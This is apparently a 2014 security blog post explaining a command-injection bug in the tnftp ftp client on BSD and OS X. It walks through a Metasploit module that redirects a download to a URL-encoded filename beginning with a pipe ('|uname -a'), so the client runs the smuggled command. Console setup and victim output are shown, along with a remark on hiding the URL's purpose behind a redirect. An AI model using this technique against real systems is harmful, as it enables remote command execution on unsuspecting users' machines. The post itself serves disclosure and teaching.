This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug? That remains unpatched today on a fairly popular operating system? Read on...

popen()'ing an RCE present

Shortly before Halloween, I was reading the oss-sec mailing list when I stumbled upon a pretty cool (almost tragic) bug in the ftp(1) command on {Free,Net,DragonFly}BSD and OS X.

The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:

This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource.

If tnftp is executed without the -o command-line option, it will resolvethe output filename from the last component of the requested resource.

If the output filename begins with a "|" character, tnftp will pass thefetched resource's output to the command directly following the "|" character through the use of the popen() function.

Okay, so how do we use this thing?

We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy:

msf > use auxiliary/server/tnftp_savefile     
msf auxiliary(tnftp_savefile) > set uripath /    
uripath => /    
msf auxiliary(tnftp_savefile) > set urihost [redacted]    
urihost => [redacted]    
msf auxiliary(tnftp_savefile) > set uriport 80    
uriport => 80    
msf auxiliary(tnftp_savefile) > run    
[*] Auxiliary module execution completed    
msf auxiliary(tnftp_savefile) >     
[*] Using URL: http://0.0.0.0:8080/    
[*]  Local IP: http://10.6.0.59:8080/    
[*] Server started.    

Don't worry about the URIHOST or URIPORT advanced options unless you're working through a tunnel. Just set URIPATH to / to allow any URL to redirect to the exploit.

Triggering the vulnerability

Here we are triggering the vuln on a fully patched OS X Yosemite system:

wvu@hiigara:~$ ftp http://[redacted]/index.html    
Requesting http://[redacted]/index.html    
Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61    
Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61    
     0        0.00 KiB/s Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64    
     0        0.00 KiB/s     
wvu@hiigara:~$   

Thanks to the redirect, we can hide the true purpose of our URL until it's too late.

Back in msfconsole, we can see the results of our attack:

[*] 10.6.0.59        tnftp_savefile - tnftp/20070806 connected  
[*] 10.6.0.59        tnftp_savefile - Redirecting to exploit...  
[+] 10.6.0.59        tnftp_savefile - Executing `uname -a'!  

That's really all there is to it! Happy hacking!